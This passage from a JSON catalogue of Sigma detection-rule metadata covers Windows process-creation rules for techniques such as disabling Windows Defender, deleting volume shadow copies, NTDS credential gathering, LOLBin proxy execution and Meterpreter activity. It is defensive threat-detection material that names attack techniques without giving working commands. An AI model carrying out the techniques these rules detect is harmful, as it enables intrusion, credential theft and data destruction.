disable security services such as Windows Defender.", "meta": { "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", "creation_date": "2021-07-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_disable_sec_services.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://vms.drweb.fr/virus/?i=24144899", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", "value": "Security Service Disabled Via Reg.EXE" }, { "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", "meta": { "author": "sam0x90", "creation_date": "2021-08-06", "falsepositive": [ "To be determined" ], "filename": "proc_creation_win_esentutl_params.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://attack.mitre.org/software/S0404/", "https://twitter.com/vxunderground/status/1423336151860002816", "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml" ], "tags": [ "attack.credential-access", "attack.t1003", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", "value": "Esentutl Gather Credentials" }, { "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "meta": { "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "creation_date": "2021-07-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_spoolsv_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml" ], "tags": [ "attack.execution", "attack.t1203", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "value": "Suspicious Spool Service Child Process" }, { "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", "meta": { "author": "frack113", "creation_date": "2021-07-12", "falsepositive": [ "App-V clients" ], "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code" }, { "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/de-de/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "value": "Potential PowerShell Execution Policy Tampering - ProcCreation" }, { "description": "Detects potential malicious and unauthorized usage of bcdedit.exe", "meta": { "author": "@neu5ron", "creation_date": "2019-02-07", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_bcdedit_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", "https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcdedit_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.persistence", "attack.t1542.003" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1b7b1806-7746-41a1-a35d-e48dae25ddba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", "value": "Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE" }, { "description": "Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\nProcess Hacker is a tool to view and manipulate processes, kernel options and other low level options.\nThreat actors abused older vulnerable versions to manipulate system processes.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-10", "falsepositive": [ "While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis" ], "filename": "proc_creation_win_pua_process_hacker.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://processhacker.sourceforge.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" ], "tags": [ "attack.defense-evasion", "attack.discovery", "attack.persistence", "attack.privilege-escalation", "attack.t1622", "attack.t1564", "attack.t1543" ] }, "related": [ { "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", "value": "PUA - Process Hacker Execution" }, { "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", "meta": { "author": "frack113", "creation_date": "2022-03-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "value": "Fsutil Behavior Set SymlinkEvaluation" }, { "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "creation_date": "2022-06-21", "falsepositive": [ "Legitimate usage of \".diagcab\" files" ], "filename": "proc_creation_win_msdt_susp_cab_options.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://twitter.com/nas_bench/status/1537896324837781506", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "value": "Suspicious Cabinet File Execution Via Msdt.EXE" }, { "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", "meta": { "author": "frack113, Florian Roth", "creation_date": "2022-09-02", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pua_frp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://asec.ahnlab.com/en/38156/", "https://github.com/fatedier/frp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_frp.yml" ], "tags": [ "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", "value": "PUA - Fast Reverse Proxy (FRP) Execution" }, { "description": "Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.\nMalware such as Pikabot and Qakbot were seen using similar techniques as well as many others.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')", "creation_date": "2023-05-15", "falsepositive": [ "Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly." ], "filename": "proc_creation_win_wscript_cscript_susp_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_22.12.2023.txt", "Internal Research", "https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b6676963-0353-4f88-90f5-36c20d443c6a", "value": "Cscript/Wscript Potentially Suspicious Child Process" }, { "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", "meta": { "author": "Sreeman", "creation_date": "2020-09-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", "value": "Potential Persistence Via Microsoft Compatibility Appraiser" }, { "description": "Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate PowerShell scripts" ], "filename": "proc_creation_win_powershell_remove_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "value": "Tamper Windows Defender Remove-MpPreference" }, { "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.\nThis detection assumes that PowerShell commands are passed via the CommandLine.\n", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-08-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_powershell_execution_via_dll.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_execution_via_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", "value": "Potential PowerShell Execution Via DLL" }, { "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", "meta": { "author": "frack113", "creation_date": "2022-01-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_rmdir_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.004" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41ca393d-538c-408a-ac27-cf1e038be80c", "value": "Directory Removal Via Rmdir" }, { "description": "Detects the execution of the PurpleSharp adversary simulation tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-06-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_purplesharp_indicators.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mvelazc0/PurpleSharp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml" ], "tags": [ "attack.t1587", "attack.resource-development" ] }, "related": [ { "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "value": "HackTool - PurpleSharp Execution" }, { "description": "Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\nThis detection focuses on the keywords that the attacker might use as a filter.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2023-10-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_security_keyword_lookup.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf", "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/", "https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml" ], "tags": [ "attack.discovery", "attack.t1518.001" ] }, "related": [ { "dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe074b4-b833-4081-8f24-7dcfeca72b42", "value": "Security Tools Keyword Lookup Via Findstr.EXE" }, { "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml" ], "tags": [ "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", "value": "Deletion of Volume Shadow Copies via WMI with PowerShell" }, { "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Use of Program Compatibility Troubleshooter Helper" ], "filename": "proc_creation_win_lolbin_pcwutl.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", "https://twitter.com/harr0ey/status/989617817849876488", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwutl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "value": "Code Execution via Pcwutl.dll" }, { "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "meta": { "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2018-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "55f0a3a1-846e-40eb-8273-677371b8d912", "value": "Outlook EnableUnsafeClientMailRules Setting Enabled" }, { "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", "meta": { "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "creation_date": "2019-10-26", "falsepositive": [ "Commandlines containing components like cmd accidentally", "Jobs and services started with cmd" ], "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134.001", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15619216-e993-4721-b590-4c520615a67d", "value": "Potential Meterpreter/CobaltStrike Activity" }, { "description": "Shadow Copies storage symbolic link creation using operating systems utilities", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate administrator working with shadow copies, access for backup purposes" ], "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b19fa6-d835-400c-b301-41f3a2baacaf", "value": "VolumeShadowCopy Symlink Creation Via Mklink" }, { "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-14", "falsepositive": [ "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" ], "filename": "proc_creation_win_servu_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml" ], "tags": [ "attack.credential-access", "attack.t1555", "cve.2021-35211" ] }, "related": [ { "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "value": "Suspicious Serv-U Process Pattern" }, { "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", "meta": { "author": "Florian Roth (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_obfuscated_ip_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://twitter.com/fr0s7_/status/1712780207105404948", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "value": "Obfuscated IP Download Activity" }, { "description": "Detects potential arbitrary file download using a Microsoft Office application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community", "creation_date": "2022-05-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_arbitrary_cli_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "value": "Potential Arbitrary File Download Using Office Application" }, { "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_pubprn.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216.001" ] }, "related": [ { "dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "value": "Pubprn.vbs Proxy Execution" }, { "description": "Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.", "meta": { "author": "X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_reg_loader.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "86588b36-c6d3-465f-9cee-8f9093e07798", "value": "Scheduled Task Executing Payload from Registry" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_3.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f9578658-9e71-4711-b634-3f9b50cd3c06", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3" }, { "description": "An adversary might use WMI to discover information about the system, such as the volume name, size,\nfree space, and other disk information. This can be done using the `wmic` command-line utility and has been\nobserved being used by threat actors such as Volt Typhoon.\n", "meta": { "author": "Stephen Lincoln `@slincoln-aiq`(AttackIQ)", "creation_date": "2024-02-02", "falsepositive": [ "Unknown" 